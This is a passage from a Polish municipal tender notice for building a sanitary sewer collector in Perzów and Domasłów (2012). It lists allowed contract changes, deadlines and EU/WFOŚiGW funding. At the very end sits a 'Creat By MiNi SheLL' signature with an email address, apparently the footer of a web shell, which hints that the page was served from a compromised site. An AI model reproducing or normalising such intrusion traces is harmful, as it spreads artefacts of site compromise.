kierownika budowy wskazanej w ofercie w przypadku sytuacji niezależnej od Wykonawcy lub na żądanie Zamawiającego jeżeli nie wywiązuje się on z nałożonych obowiązków; Zmiany innych osób wskazywanych w umowie; 3.. Zamawiający, na pisemny wniosek Wykonawcy, dopuszcza zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zmiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę. 
IV. INNE ZMIANY: : 1.. Dopuszcza się Zmiany umowy wskutek wystąpienie okoliczności, których Zamawiający nie był w stanie przewidzieć, pomimo zachowania należytej staranności; 2.. Możliwe są zmiany umowy, które w sposób obiektywny są korzystne dla Zamawiającego, a na dokonanie tej zmiany wyraża zgodę Wykonawca; 3.. Zmiany spowodowane zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT); 4.. Zmiany harmonogramu rzeczowo-finansowego nie wpływające na dochowanie terminów umownych; 5.. Zmiany terminu lub sposobu wykonania przedmiotu zamówienia, gdy zasadność takiej zmiany powstała na skutek zmiany zasad finansowania zadania wynikająca z podpisanych przez Zamawiającego umów, bądź przewidzianych do podpisania lub do aneksowania umów z instytucjami zewnętrznymi; 6.. Zmiany terminów i kwot płatności faktur, o których mowa w par. 5 ust.3 pkt 3, pkt 4, w szczególności jeżeli zmiana taka umożliwi Zamawiającemu sprawne i zgodne z zwartymi umowami pozyskanie zewnętrznych środków finansowych przeznaczonych na realizację zadania lub -i  terminowe rozliczenie się z zakończenia inwestycji przed instytucjami zewnętrznymi, lub wynikają ze znacząco szybszego zakończenia realizacji przedmiotu zamówienia, niż wskazują na to terminy umowne określone w par. 2 umowy; 7.. Zmiany zapisów umowy będących wynikiem realizacji przez Zamawiającego uprawnień z tytułu rękojmi lub gwarancji na wykonane roboty budowlane; 8.. Zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych; 9.. Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy; 10.. Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na  krąg podmiotów ubiegających się o zamówienia  ani na wynik postępowania o udzielenie zam pub. 11.. Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody i nie rodzą żadnego roszczenia w stosunku do Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.perzow.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY PERZÓW,  63-642 Perzów,  Perzów 78 - pok. 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2012 godzina 12:00, miejsce: URZĄD GMINY PERZÓW,  63-642 Perzów,  Perzów 78 - pok. 2 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie Budowa kolektora sanitarnego w miejscowości Perzów i Domasłów stanowi drugi etap operacji pod nazwą Budowa kolektora sanitarnego i przydomowych oczyszczalni ścieków w miejscowości Domasłów i Perzów wraz z rozbudową oczyszczalni ścieków w Perzowie realizowanej w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013, Działania 321 Podstawowe usługi dla gospodarki i ludności wiejskiej.  Zgodnie z umowa  o przyznanie pomocy Nr 00041-6921-UM1500177-10 z dnia 03.02.2010r., na realizację zadania przyznano Zamawiającemu pomoc finansową pochodząca z środków unijnych w wysokości do 50 procent kosztów kwalifikowanych operacji uruchamiana po zakończeniu zadania. .Ponadto przewiduje się, że zadanie będzie finansowane m.in. z środków pożyczki WFOŚiGW w Poznaniu zgodnie z promesą. .Gdyby zaszła taka potrzeba, Wykonawca jest zobowiązany do spełniania wymogów i stosowania procedur określonych w umowach zawieranych przez Zamawiającego dotyczących finansowania zadania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com